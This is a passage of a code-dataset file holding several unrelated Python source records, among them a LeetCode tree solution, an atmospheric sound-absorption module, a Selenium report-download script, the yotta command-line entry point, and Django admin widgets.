[]\n\t\tpathSum.append(node.val)\n\t\tif left:\n\t\t\tfor v in left:\n\t\t\t\tpathSum.append(v+node.val)\n\t\tif right:\n\t\t\tfor v in right:\n\t\t\t\tpathSum.append(v+node.val)\n\t\tfor v in pathSum:\n\t\t\tif v == target:\n\t\t\t\tself.counter += 1\n\t\treturn pathSum\n","sub_path":"interview/facebook/easy/LC437. Path Sum III.py","file_name":"LC437. 
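Editor's note on the jogoDoNim.py record above (Portuguese UI strings: "Quantas pecas?" = "How many pieces?", "Você venceu" = "You won", "Sobraram X peças na mesa" = "X pieces left on the table"): computador_escolhe_jogada encodes the standard strategy for this Nim variant. With n pieces and at most m removable per turn, the positions that are multiples of m + 1 are losing for the player to move, so the computer removes the i that leaves such a multiple behind. A worked check with illustrative values:

# n = 11, m = 3: 11 % 4 == 3, so taking 3 leaves 8, a multiple of 4.
# Whatever the opponent takes next (k in 1..3), answering with 4 - k steps
# the pile 8 -> 4 -> 0, and the computer takes the last piece.
n, m = 11, 3
move = next(i for i in range(1, m + 1) if (n - i) % (m + 1) == 0)
assert move == 3

Note that the loop falls through and returns None when n is already a multiple of m + 1; partida() sidesteps that state by letting the user start there, but a trailing "return 1" would make the helper total.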
Path Sum III.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"571577300","text":"\"\"\"\nModule containing functions and a classes related to atmospheric acoustics.\n\"\"\"\nfrom __future__ import division, print_function\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntry:\n from pyfftw.interfaces.numpy_fft import ifft # Performs much better than numpy's fftpack\nexcept ImportError: # Use monkey-patching np.fft perhaps instead?\n from numpy.fft import ifft\n\n\ndef soundspeed(ref_temp, temp):\n \"\"\"\n Speed of sound :math:`c`.\n \n :param ref_temp: Reference temperature :math:`T`\n :param temp: Ambient temperature :math:`T_0`\n \n According to ISO9613-1:1993.\n \n .. math:: c = 343.2 \\\\left( \\\\frac{T}{T_0} \\\\right)\n \n \"\"\"\n return 343.2 * np.sqrt(temp / ref_temp)\n \ndef saturation_pressure(ref_pressure, triple_temp, temp):\n \"\"\"\n Saturation vapour pressure :math:`p_{sat}`.\n \n :param ref_pressure: Reference pressure :math:`p_r`\n :param triple_temp: Triple point temperature water :math:`T_{01}`\n :param temp: Ambient temperature :math:`T`\n \n According to ISO9613-1:1993.\n \n .. math:: p_{sat} = 10^C \\cdot p_r\n \n with exponent :math:`C` given by\n \n .. math:: C = -6.8346 \\cdot \\\\left( \\\\frac{T_{01}}{T} \\\\right)^{1.261} + 4.6151\n \n \"\"\"\n return ref_pressure * 10.0** (-6.8346 *(triple_temp/temp)**(1.261) + 4.6151)\n\ndef molar_concentration_water_vapour(relative_humidity, saturation_pressure, pressure):\n \"\"\"\n Molar concentration of water vapour :math:`h`.\n \n :param relative_humidity: Relative humidity :math:`h_r`\n :param saturation_pressure: Saturation pressure :math:`p_{sat}`\n :param pressure: Ambient pressure :math:`p`\n \n According to ISO9613-1:1993.\n \n .. math:: h = h_r \\\\frac{p_{sat}}{p_a}\n \n \"\"\"\n return relative_humidity * saturation_pressure / pressure\n\ndef relaxation_frequency_oxygen(pressure, ref_pressure, h):\n \"\"\"\n Relaxation frequency of oxygen :math:`f_{r,O}`.\n \n :param pressure: Ambient pressure :math:`p_a`\n :param ref_pressure: Reference pressure :math:`p_r`\n :param h: Molar concentration of water vapour :math:`h`\n \n According to ISO9613-1:1993.\n \n .. math:: f_{r,O} = \\\\frac{p_a}{p_r} \\\\left( 24 + 4.04 \\cdot 10^4 h \\\\frac{0.02 + h}{0.391 + h} \\\\right)\n \n \"\"\"\n return pressure / ref_pressure * ( 24.0 + 4.04 * 10.0**4.0 * h * (0.02 + h) / (0.391 + h) )\n\ndef relaxation_frequency_nitrogen(pressure, ref_pressure, temperature, ref_temperature, h): \n \"\"\"\n Relaxation frequency of nitrogen :math:`f_{r,N}`.\n \n :param pressure: Ambient pressure :math:`p_a`\n :param ref_pressure: Reference pressure :math:`p_{ref}`\n :param temperature: Ambient temperature :math:`T`\n :param ref_temperature: Reference temperature :math:`T_{ref}`\n :param h: Molar concentration of water vapour :math:`h`\n \n According to ISO9613-1:1993.\n \n .. 
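Editor's note on the Path Sum III record above: helper(node, target) returns the sums of every downward path that starts at node, bumping the class-level counter whenever one equals the target; pathSum just seeds the recursion and reads the accumulated count. A smoke test against the LeetCode 437 sample; the TreeNode class is assumed here, since LeetCode normally supplies it:

# Minimal stand-in for LeetCode's TreeNode.
class TreeNode(object):
	def __init__(self, val, left=None, right=None):
		self.val, self.left, self.right = val, left, right

# Sample tree from LeetCode 437; target 8 has three paths:
# 5->3, 5->2->1 and -3->11.
root = TreeNode(10,
	TreeNode(5, TreeNode(3, TreeNode(3), TreeNode(-2)),
	         TreeNode(2, right=TreeNode(1))),
	TreeNode(-3, right=TreeNode(11)))
print(Solution().pathSum(root, 8))  # expected: 3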
math:: f_{r,N} = \\\\frac{p_a}{p_r} \\\\left( \\\\frac{T}{T_0} \\\\right)^{-1/2} \\cdot \\\\left( 9 + 280 h \\exp{\\\\left\\{ -4.170 \\\\left[ \\\\left(\\\\frac{T}{T_0} \\\\right)^{-1/3} -1 \\\\right] \\\\right\\} } \\\\right)\n \n \"\"\"\n return pressure / ref_pressure * (temperature/ref_temperature)**(-0.5) * (9.0 + 280.0 * h * np.exp(-4.170 * ((temperature/ref_temperature)**(-1.0/3.0) - 1.0 ) ) )\n\ndef attenuation_coefficient(pressure, reference_pressure, temperature, reference_temperature, relaxation_frequency_nitrogen, relaxation_frequency_oxygen, frequency):\n \"\"\"\n Attenuation coefficient :math:`\\\\alpha` describing atmospheric absorption in dB/m for the specified ``frequency``.\n \n :param temperature: Ambient temperature :math:`T`\n :param pressure: Ambient pressure :math:`T`\n \n :param frequency: Frequencies to calculate :math:`\\\\alpha` for.\n \n According to ISO9613-1:1993.\n \"\"\"\n return 8.686 * frequency**2.0 * ( ( 1.84 * 10.0**(-11.0) * (reference_pressure/pressure) * (temperature/reference_temperature)**(0.5)) + (temperature/reference_temperature)**(-2.5) * ( 0.01275 * np.exp(-2239.1 / temperature) * (relaxation_frequency_oxygen + (frequency**2.0/relaxation_frequency_oxygen))**(-1.0) + 0.1068 * np.exp(-3352.0/temperature) * (relaxation_frequency_nitrogen + (frequency**2.0/relaxation_frequency_nitrogen))**(-1.0) ) )\n\n\nclass Atmosphere(object):\n \"\"\"\n Class describing atmospheric conditions.\n \"\"\"\n \n REF_TEMP = 293.15\n \"\"\"Reference temperature\"\"\"\n \n REF_PRESSURE = 101.325\n \"\"\"International Standard Atmosphere in kilopascal\"\"\"\n \n TRIPLE_TEMP = 273.16\n \"\"\"Triple point isotherm temperature.\"\"\"\n\n def __init__(self, temperature=293.15, pressure=101.325, relative_humidity=0.0):\n \"\"\"\n Constructor\n \n :param temperature: Temperature\n :param pressure: Pressure\n :param relative_humidity: Relative humidity\n \"\"\"\n \n ###self.__class__.temperature.add_callback(self, self._update)\n ###self.__class__.pressure.add_callback(self, self._update)\n ###self.__class__.relative_humidity.add_callback(self, self._update)\n \n self.temperature = temperature\n \"\"\"Ambient temperature :math:`T`.\"\"\"\n \n self.pressure = pressure\n \"\"\"Ambient pressure :math:`p_a`.\"\"\"\n \n self.relative_humidity = relative_humidity\n \"\"\"Relative humidity\"\"\"\n \n @property\n def soundspeed(self):\n \"\"\"\n Speed of sound :math:`c` calculated using :func:`Auraliser.Atmosphere.soundspeed`.\n \"\"\"\n return soundspeed(self.temperature, self.REF_TEMP)\n \n @property\n def saturation_pressure(self):\n \"\"\"\n Saturation pressure :math:`p_{sat}` calculated using :func:`Auraliser.Atmosphere.saturation_pressure`.\n \"\"\"\n return saturation_pressure(self.REF_PRESSURE, self.TRIPLE_TEMP, self.temperature)\n \n @property\n def molar_concentration_water_vapour(self):\n \"\"\"\n Molar concentration of water vapour :math:`h` calculated using :func:`Auraliser.Atmosphere.molar_concentration_water_vapour`.\n \"\"\"\n return molar_concentration_water_vapour(self.relative_humidity, self.saturation_pressure, self.pressure)\n \n @property\n def relaxation_frequency_nitrogen(self):\n \"\"\"\n Resonance frequency of nitrogen :math:`f_{r,N}` calculated using :func:`Auraliser.Atmosphere.relaxation_frequency_nitrogen`.\n \"\"\"\n return relaxation_frequency_nitrogen(self.pressure, self.REF_PRESSURE, self.temperature, self.REF_TEMP, self.molar_concentration_water_vapour)\n \n @property\n def relaxation_frequency_oxygen(self):\n \"\"\"\n Resonance frequency of oxygen 
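Editor's note, one flag on the Atmosphere.soundspeed property above: the module-level function is declared soundspeed(ref_temp, temp) and computes 343.2 * sqrt(temp / ref_temp), but the property calls soundspeed(self.temperature, self.REF_TEMP), i.e. with the arguments reversed, which inverts the ratio (warmer air would come out slower, and the error is invisible exactly at 20 °C where both orderings give 343.2 m/s). Assuming the ISO 9613-1 form the docstrings state, the corrected call is:

    @property
    def soundspeed(self):
        # ref_temp first, ambient temperature second, matching the
        # module-level signature soundspeed(ref_temp, temp).
        return soundspeed(self.REF_TEMP, self.temperature)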
:math:`f_{r,O}` calculated using :func:`Auraliser.Atmosphere.relaxation_frequency_oxygen`.\n \"\"\"\n return relaxation_frequency_oxygen(self.pressure, self.REF_PRESSURE, self.molar_concentration_water_vapour)\n \n \n def attenuation_coefficient(self, frequency):\n \"\"\"\n Attenuation coefficient :math:`\\\\alpha` describing atmospheric absorption in dB/m as function of ``frequency``.\n \n :param frequency: Frequencies to be considered.\n \"\"\"\n return attenuation_coefficient(self.pressure, self.REF_PRESSURE, self.temperature, self.REF_TEMP, self.relaxation_frequency_nitrogen, self.relaxation_frequency_oxygen, frequency)\n \n ###def atmospheric_absorption(self, signal):\n ###\"\"\"\n ###Calculate the signal for the atmospheric absorption.\n \n ###:param signal:\n ###:type signal: `Auraliser.Signal.Signal`\n ###\"\"\"\n \n ###\"\"\"Octaves object\"\"\"\n ###o = Acoustics.Octave.Octave(fmin=1.0, fmax=signal.sample_frequency/2.0, order=24)\n ###frequencies = o.center()\n \n ###t = np.arange(0, len(signal)) # Time signal\n \n ###alpha = self.atmosphere.attenuation_coefficient(frequencies)\n \n ###A = 10.0**(alpha/10.0) # Convert from decibel/m to linear/m\n \n ###A *= o.bandwidth() # Integrate over the frequency band\n \n ###phi = np.random.randn(len(frequencies)) # Random phase\n ####phi = np.zeros(len(frequencies))\n \n ###d = self.geometry.distance # Distance. Final Multiplier for signal strength.\n \n ###print A * np.sin(2.0 * np.pi * np.outer(t, frequencies)+ phi)\n \n ###\"\"\"Absorption time signal.\"\"\"\n ###s = d * np.sum( A * np.sin(2.0 * np.pi * np.outer(t, frequencies)+ phi))\n \n ####s /= np.sum(o.bandwidth())\n\n ###return s\n \n ##def absorption_coefficient(self, frequencies):\n ##\"\"\"\n ##Calculate the absorption coefficient in dB/m for the given frequencies.\n \n ##According to ISO9613-1:1993.\n \n ##:param frequencies: Frequencies to calculate alpha for.\n ##:type frequencies: :class:`np.ndarray`\n ##\"\"\"\n \n ###T = np.array(self.temperature, dtype='float128') # Ambient temperature\n ###p_a = np.array(self.pressure, dtype='float128') # Ambient pressure\n ###h = np.array(self.molar_concentration_water_vapour, dtype='float128') # Ambient molar...\n \n ###p_r = np.array(self.REF_PRESSURE, dtype='float128') # Reference pressure\n ###T0 = np.array(self.REF_TEMP, dtype='float128') # Reference temperature\n \n ###f = np.array(frequencies, dtype='float128')\n \n \n ##T = self.temperature # Ambient temperature\n ##p_a = self.pressure # Ambient pressure\n ##h = self.molar_concentration_water_vapour # Ambient molar...\n \n ##p_r = self.REF_PRESSURE # Reference pressure\n ##T0 = self.REF_TEMP # Reference temperature\n \n ##f = frequencies\n \n \n ##\"\"\"Relaxation frequency of oxygen.\"\"\"\n ##f_rO = p_a / p_r * ( 24.0 + 4.04 * 10.0**4.0 * h * (0.02 + h) / (0.391 + h) )\n \n ##\"\"\"Relaxation frequency of nitrogen.\"\"\"\n ##f_rN = p_a / p_r * (T/T0)**(-0.5) * (9.0 + 280.0 * h * np.exp(-4.170 * ((T/T0)**(-1.0/3.0) - 1.0 ) ) )\n \n ##alpha = 8.686 * f**2.0 * ( ( 1.84 * 10.0**(-11.0) * (p_r/p_a) * (T/T0)**(0.5)) + (T/T0)**(-2.5) * ( 0.01275 * np.exp(-2239.1 / T) * (f_rO + (f**2.0/f_rO))**(-1.0) + 0.1068 * np.exp(-3352.0/T) * (f_rN + (f**2.0/f_rN))**(-1.0) ) )\n \n ##return alpha\n \n def ir_attenuation_coefficient(self, d, fs=44100, N=2048, sign=+1):\n \"\"\"\n Calculate the impulse response due to air absorption.\n \n :param fs: Sample frequency\n :param d: Distance\n :param N: Blocks\n :param sign: Multiply (+1) or divide (-1) by transfer function. 
Multiplication is used for applying the absorption while -1 is used for undoing the absorption.\n \"\"\" \n \n d = d if isinstance(d, np.ndarray) else np.array([d])\n \n f = np.linspace(0.0, fs/2.0, N/2.0) # Frequency vector. A bin for every signal sample.\n \n tf = np.zeros((len(d), len(f)), dtype='complex') # Transfer function needs to be complex, and same size.\n tf += 10.0**( float(sign) * d.reshape((-1,1)) * self.attenuation_coefficient(f) / 20.0 ) # Calculate the actual transfer function.\n \n #print('TF: ' + str(tf.shape))\n \n #tf = np.concatenate( ( tf, np.conj(tf[::-1]) )) \n tf = np.hstack( (tf, np.conj(tf[::-1, :]))) # Positive frequencies first, and then mirrored the conjugate negative frequencies.\n \n #print('TF reshaped: ' + str(tf.shape))\n \n #n = 2**int(np.ceil(np.log2(len(tf)))) # Blocksize for the IFFT. Zeros are padded.\n\n ir = ifft( tf , n=N) # Obtain the impulse response through the IFFT.\n \n ir = np.hstack((ir[:, N/2:N], ir[:, 0:N/2]))\n \n #ir = np.real(ir[0:N/2])\n \n ir = np.real(ir).T\n \n return ir # Note that the reduction is a factor two too much! Too much energy loss now that we use a double-sided spectrum.\n \n def plot_ir_attenuation_coefficient(self, fs, N, d, filename=None):\n \"\"\"\n Plot the impulse response of the attenuation due to atmospheric absorption.\n The impulse response is calculated using :meth:`ir_attenuation_coefficient`.\n \n :param filename: Filename\n :param fs: Sample frequency\n :param N: Blocks\n :param d: Distance\n \n \"\"\"\n fig = plt.figure()\n \n ax0 = fig.add_subplot(111)\n ax0.set_title('Impulse response atmospheric attenuation')\n \n ir = self.ir_attenuation_coefficient(fs, N, d)\n \n xsignal = np.arange(0.0, len(ir)) / fs\n ax0.plot(xsignal, ir)\n ax0.set_xlabel(r'$t$ in s')\n ax0.set_ylabel(r'Some')\n ax0.set_yscale('log')\n ax0.grid()\n \n if filename:\n fig.savefig(filename)\n else:\n fig.show()\n \n \n \n def plot_attenuation_coefficient(self, frequency, filename=None):\n \"\"\"\n Plot the attenuation coefficient :math:`\\\\alpha` as function of frequency and write the figure to ``filename``.\n \n :param filename: Filename\n :param frequency: Frequencies\n \n .. 
note:: The attenuation coefficient is plotted in dB/km!\n \n \"\"\"\n fig = plt.figure()\n ax0 = fig.add_subplot(111)\n \n ax0.plot(frequency, self.attenuation_coefficient(frequency)*1000.0)\n ax0.set_xscale('log')\n ax0.set_yscale('log')\n ax0.set_xlabel(r'$f$ in Hz')\n ax0.set_ylabel(r'$\\alpha$ in dB/km')\n \n ax0.legend()\n ax0.grid()\n \n if filename:\n fig.savefig(filename)\n else:\n fig.show()\n \n","sub_path":"acoustics/atmosphere.py","file_name":"atmosphere.py","file_ext":"py","file_size_in_byte":14017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"292277070","text":"\"\"\"\n@ Author - Krishnabhashkar jha\n@ Creation date - 17/01/2020\n@ Description - Declares all the Methods to be used at the Process Level.\n\"\"\"\n\nimport time\nimport shutil\nimport os\nimport datetime\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom Applications.Workflows.Analytics.RetailerPortalScraping.AmazonPortal.AmazonSuppliers import AmazonSuppliers\nfrom Applications.Workflows.Analytics.RetailerPortalScraping.Utilites.LogFileUtility import LogFileUtility as lo\n\nclass AmazonPortalMain():\n\n def __init__(self):\n chrome_option = Options()\n chrome_option.add_argument(\"--user-data-dir=C:/Users/Krishnabhashkar.Jha/AppData/Local/Google/Chrome/User Data\")\n self.v_Browser = webdriver.Chrome(executable_path='C:/driver/chromedriver', chrome_options=chrome_option)\n self.v_Browser.maximize_window()\n self.lo = lo\n\n def Execute_Main(self):\n try:\n var_pathName = \"C:\\Automation\\Amazon\"\n shutil.rmtree(var_pathName)\n os.makedirs(\"C:\\Automation\" + \"\\\\\" + 'Amazon')\n Days = datetime.datetime.now()\n var_foldername = Days.strftime(\"%d-%b-%Y\")\n var_pathName = \"C:\\Automation\\Amazon\" + \"\\\\\" + var_foldername\n if os.path.exists(var_pathName):\n shutil.rmtree(var_pathName)\n if not os.path.exists(var_pathName):\n try:\n os.makedirs(\"C:\\Automation\\Amazon\" + \"\\\\\" + var_foldername)\n os.makedirs(r'C:\\\\Automation\\Amazon' + \"\\\\\" + var_foldername + \"\\\\\" + 'AmazonPortal')\n self.lo.log_to_file(self, \"INFO\", \"Folder created For AmazonPortal.\")\n finally:\n Main_Methods = AmazonSuppliers(self.v_Browser, self.lo)\n Main_Methods.Execute_AmazonSuppliers()\n self.lo.log_to_file(self, \"INFO\", \"Download Complete for AmazonPortal\")\n shutil.make_archive(r'C:\\Automation\\BackUp\\Reports' + var_foldername, 'zip', 'C:/Automation/Amazon')\n\n except Exception as e:\n self.lo.log_to_file(self, \"ERROR\", \"Exception:\" + str(e))\n\n\n\n\n\n\n\n\n","sub_path":"Applications/Workflows/Analytics/RetailerPortalScraping/AmazonPortal/AmazonPortal_Main.py","file_name":"AmazonPortal_Main.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"334950369","text":"# standard library modules, , ,\nimport argparse\nimport logging\nimport sys\nimport platform\nimport pkg_resources\n\n# subcommand modules, , add subcommands, internal\nfrom . import version\nfrom . import link\nfrom . import link_target\nfrom . import install\nfrom . import update\nfrom . import target\nfrom . import build\nfrom . import init\nfrom . import publish\nfrom . import debug\nfrom . import login\nfrom . import logout\nfrom . import list\nfrom . import uninstall\nfrom . 
import owners\n\nfrom lib import logging_setup\n\n# settings, , load and save settings, internal\nfrom lib import settings\n\ndef logLevelFromVerbosity(v):\n return max(1, logging.INFO - v * (logging.ERROR-logging.NOTSET) / 5)\n\ndef defaultTarget():\n set_target = settings.getProperty('build', 'target')\n if set_target:\n return set_target\n\n machine = platform.machine()\n\n x86 = machine.find('86') != -1\n arm = machine.find('arm') != -1 or machine.find('aarch') != -1\n\n prefix = \"x86-\" if x86 else \"arm-\" if arm else \"\"\n platf = 'unknown'\n\n if sys.platform == 'linux':\n platf = 'linux-native'\n elif sys.platform == 'darwin':\n platf = 'osx-native'\n elif sys.platform.find('win') != -1:\n platf = 'win'\n return prefix + platf + ','\n\ndef main():\n parser = argparse.ArgumentParser()\n subparser = parser.add_subparsers(metavar='{install, update, version, link, link-target, target, build, init, publish, login, logout, list, uninstall, owners}')\n\n parser.add_argument('--version', dest='show_version', action='version',\n version=pkg_resources.require(\"yotta\")[0].version,\n help='display the version'\n )\n parser.add_argument('-v', '--verbose', dest='verbosity', action='count',\n default=0,\n help='increase verbosity: can be used multiple times'\n )\n parser.add_argument('-d', '--debug', dest='debug', action='append',\n metavar='SUBSYS',\n help='specify subsystems to debug: use in conjunction with -v to '+\n 'increase the verbosity only for specified subsystems'\n )\n\n parser.add_argument('-t', '--target', dest='target',\n default=defaultTarget(),\n help='Set the build and dependency resolution target (targetname[,versionspec_or_url])'\n )\n\n def addParser(name, module, description):\n parser = subparser.add_parser(name, description=description)\n module.addOptions(parser)\n parser.set_defaults(command=module.execCommand)\n\n addParser('version', version, 'Bump the module version, or (with no arguments) display the current version.')\n addParser('link', link, 'Symlink a module.')\n addParser('link-target', link_target, 'Symlink a target.')\n addParser('install', install, 'Install dependencies for the current module, or a specific module.')\n addParser('update', update, 'Update dependencies for the current module, or a specific module.')\n addParser('target', target, 'Set or display the target device.')\n addParser('build', build, 'Build the current module.')\n addParser('debug', debug, 'Attach a debugger to the current target. 
Requires target support.')\n addParser('init', init, 'Create a new module.')\n addParser('publish', publish, 'Publish a module or target to the public registry.')\n addParser('login', login, 'Authorize for access to private github repositories and publishing to the yotta registry.')\n addParser('logout', logout, 'Remove saved authorization token for the current user.')\n addParser('list', list, 'List the dependencies of the current module.')\n addParser('uninstall', uninstall, 'Remove a specific dependency of the current module.')\n addParser('owners', owners, 'Add/remove/display the owners of a module or target.')\n\n # short synonyms, subparser.choices is a dictionary, so use update() to\n # merge in the keys from another dictionary\n subparser.choices.update({\n 'up':subparser.choices['update'],\n 'in':subparser.choices['install'],\n 'ln':subparser.choices['link'],\n 'v':subparser.choices['version'],\n 'ls':subparser.choices['list'],\n 'unlink':subparser.choices['uninstall'],\n 'rm':subparser.choices['uninstall'],\n 'owner':subparser.choices['owners']\n })\n\n args = parser.parse_args() \n\n loglevel = logLevelFromVerbosity(args.verbosity)\n logging_setup.init(level=loglevel, enable_subsystems=args.debug)\n \n # finally, do stuff!\n status = args.command(args)\n\n sys.exit(status or 0)\n\n","sub_path":"yotta/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"422542841","text":"\"\"\"\nchapter 7\nex 7.7 패스너스 데코레이터 사용하기\n\"\"\"\n\nimport time\n\nimport fasteners\n\n@fasteners.interprocess_locked('/tmp/tmp_lock_file')\ndef locked_print():\n for i in range(10):\n print(\"I have the lock\")\n time.sleep(0.1)\n\nlocked_print()\n\n\"\"\"\nsingle point of failure(단일 장애점)이 없으므로 local process 사이의 잠금 처리에\n좋은 방법이다\n\"\"\"\n","sub_path":"daily-programming/2019/11/ch-07-lock-mgmt/07_fasteners-decorator.py","file_name":"07_fasteners-decorator.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"467487461","text":"from typing import List\n\nfrom lang.hyperparameters import HyperParameters\n\n\nclass NeuralAssembly:\n \"\"\"\n Neural assembly is a stable activity pattern belonging to a certain area\n \"\"\"\n def __init__(self, id: str, container):\n from neurons.neuro_container import NeuroContainer\n self.pattern: str = None\n # self.phonetic_pattern: str = None\n self.id = id\n self.firing = False\n self.fired = False\n self.container: NeuroContainer = container\n self.perceptual = False\n self.is_combined = False\n self.is_joint = False\n self.is_tone = False\n self.doped = False\n self.firing_ticks = []\n self.firing_history = {}\n self.potential = 0\n self.threshold = 2\n # self.capacity = 0\n self.formed_at = 0\n self.last_fired_at = 0\n self.hierarchy_level = 0\n self.firing_count = 1\n self.contributors = []\n self.fired_contributors: List[NeuralAssembly] = []\n self._area: 'NeuralArea' = None\n self.is_winner = False # for Winner Takes It All Strategy areas\n self.source_assemblies = []\n self.source_area = None # for tone-bases assemblies\n self.activated = False\n\n @property\n def area(self):\n \"\"\"\n Area this NA belongs to\n :return:\n \"\"\"\n return self._area\n\n @area.setter\n def area(self, val):\n if self._area and self._area != val:\n raise Exception(f'NeuralAssembly.set_area(): The area of {self} is already set')\n self._area = val\n msg_data = {\n 'assembly': 
self,\n 'area': val\n }\n self.container.agent.queue_message('assembly_attached_to_area', msg_data)\n\n @property\n def is_visual(self):\n return self.pattern.startswith('v:') and ('+' not in self.pattern)\n\n @property\n def cleaned_pattern(self):\n if ':' not in self.pattern:\n return self.pattern\n last_colon_position = self.pattern[::-1].index(':')\n return self.pattern[len(self.pattern) - last_colon_position:].strip()\n\n def update(self, current_tick: int):\n self.fired = False\n area = self.area\n if current_tick in area.inhibited_at_ticks:\n self.potential = 0\n return\n if area.winner_takes_it_all_strategy:\n if self.is_winner:\n self.firing = True\n else:\n if self.potential >= self.threshold or current_tick in self.firing_ticks:\n self.firing = area.allow_firing(self)\n\n if self.firing:\n self.last_fired_at = current_tick\n self.fired = True\n self.firing = False\n connections = self.container.get_assembly_outgoing_connections(na=self)\n for conn in connections:\n conn.pulsing = True\n self.firing_history[self.container.current_tick] = list(self.fired_contributors)\n area.on_fire(self)\n # else:\n self.fired_contributors.clear()\n self.potential = 0\n self.is_winner = False\n\n def on_doped(self, current_tick: int):\n \"\"\"\n Invoked whenever dopamine reaches the assembly\n :return:\n \"\"\"\n self.doped = True\n fired_contributors = self.fired_contributors\n if not fired_contributors:\n # it might be invoked from another DOPEd assembly\n # take fired contributors from the history then\n fired_contributors = self.firing_history[self.last_fired_at]\n for na in fired_contributors:\n # TODO: consider moving this hardcoded rule into a neural areas config file\n if self.area in na.area.double_activation_from:\n connection = self.container.get_connection_between_nodes(self, na)\n if not connection:\n connection = self.container.create_connection(source=self, target=na)\n connection.multiplier = 2\n if na.area in self.area.double_activation_from:\n connection = self.container.get_connection_between_nodes(na, self)\n connection.multiplier = 2\n\n def is_successor_of(self, na: 'NeuralAssembly') -> bool:\n\n def find_in_sources(assembly: 'NeuralAssembly') -> bool:\n for a in assembly.source_assemblies:\n if a == na:\n return True\n for a in assembly.source_assemblies:\n result = find_in_sources(a)\n if result:\n return True\n return False\n\n if na == self:\n return True\n return find_in_sources(self)\n\n def _repr(self):\n return f'\"{self.pattern}\" id: {self.id}'\n\n def __repr__(self):\n return self._repr()\n\n def __str__(self):\n return self._repr()","sub_path":"src/lang/neural_assembly.py","file_name":"neural_assembly.py","file_ext":"py","file_size_in_byte":4853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"275959391","text":"'''\nScript to update modlist.html from manifest.json\n'''\n\nimport json\nfrom urllib import request, parse\n\ndef get_modlist_from_manifest():\n '''\n Will return the modlist array.\n Each element will be a dictionary.\n Each element will have: projectID, fileID, and required\n '''\n with open('manifest.json') as json_file:\n data_str = json_file.read()\n data_dict = json.loads(data_str)\n return data_dict[\"files\"]\n\ndef modlist_from_curseforge(ids):\n '''\n Fetches the list of mods from curseforge using the provided ids\n '''\n # See: 
https://twitchappapi.docs.apiary.io/#/reference/0/get-multiple-addons/get-multiple-addons/200?mc=reference%2F0%2Fget-multiple-addons%2Fget-multiple-addons%2F200\n\n req = request.Request(\"https://addons-ecs.forgesvc.net/api/v2/addon\")\n req.add_header('Content-Type', 'application/json; charset=utf-8')\n post_data_json = json.dumps(ids)\n post_data_bytes = post_data_json.encode('utf-8')\n resp_str = request.urlopen(req, post_data_bytes).read()\n resp_json = json.loads(resp_str)\n return resp_json \n\ndef main():\n modlist = get_modlist_from_manifest()\n mod_ids = [x[\"projectID\"] for x in modlist]\n cf_modlist = modlist_from_curseforge(mod_ids)\n # Sort the mod list by name:\n cf_modlist.sort(key=lambda d: d[\"name\"])\n # print out the new modlist.html\n with open('modlist.html', 'w') as f:\n f.write(\"\\n\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/update_modlist.py","file_name":"update_modlist.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"567891544","text":"import pygame as pg\nfrom random import uniform\nfrom random import randint\n\n\nclass Obstacle(pg.sprite.Sprite):\n image = pg.Surface((5, 5), pg.SRCALPHA)\n pg.draw.polygon(image, pg.Color('yellow'),\n [(0, 0), (5, 0), (5,5), (0, 5)])\n\n max_x = 0\n max_y = 0\n\n\n def __init__(self,pos):\n super(Obstacle, self).__init__()\n\n if Obstacle.max_x == 0:\n info = pg.display.Info()\n Obstacle.max_x = info.current_w\n Obstacle.max_y= info.current_h\n\n self.image = Obstacle.image.copy()\n self.rect = self.image.get_rect()\n\n self.pos = pg.math.Vector2(\n pos[0],\n pos[1])\n self.rect = self.image.get_rect(center=self.pos)\n","sub_path":"proposed_method/obstacle.py","file_name":"obstacle.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"163144519","text":"# coding: utf-8\n\nfrom django import forms\nfrom django.contrib import admin\nfrom django.contrib.admin.filters import SimpleListFilter\nfrom django.contrib.admin.widgets import ForeignKeyRawIdWidget, \\\n ManyToManyRawIdWidget\nfrom django.core.urlresolvers import reverse\nfrom django.db.models.query_utils import Q\nfrom django.utils.encoding import smart_unicode\nfrom django.utils.html import escape\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom dataman.models import DataContainer, Data\nfrom tasks.models import Task, ShellTask, ChannelTask\n\n\n#################################################\n### See: http://djangosnippets.org/snippets/2217/\n# SHOULD GO INTO OicomDjango!!!\nclass VerboseForeignKeyRawIdWidget(ForeignKeyRawIdWidget):\n def label_for_value(self, value):\n key = self.rel.get_related_field().name\n try:\n obj = self.rel.to._default_manager.using(self.db).get(**{key: value})\n change_url = reverse(\n \"admin:%s_%s_change\" % (obj._meta.app_label, obj._meta.object_name.lower()),\n args=(obj.pk,)\n )\n return ' %s' % (change_url, escape(obj))\n except (ValueError, self.rel.to.DoesNotExist):\n return '???'\n\nclass VerboseManyToManyRawIdWidget(ManyToManyRawIdWidget):\n def label_for_value(self, value):\n values = value.split(',')\n str_values = []\n key = self.rel.get_related_field().name\n for v in values:\n try:\n obj = self.rel.to._default_manager.using(self.db).get(**{key: v})\n x = smart_unicode(obj)\n change_url = reverse(\n \"admin:%s_%s_change\" % (obj._meta.app_label, obj._meta.object_name.lower()),\n args=(obj.pk,)\n 
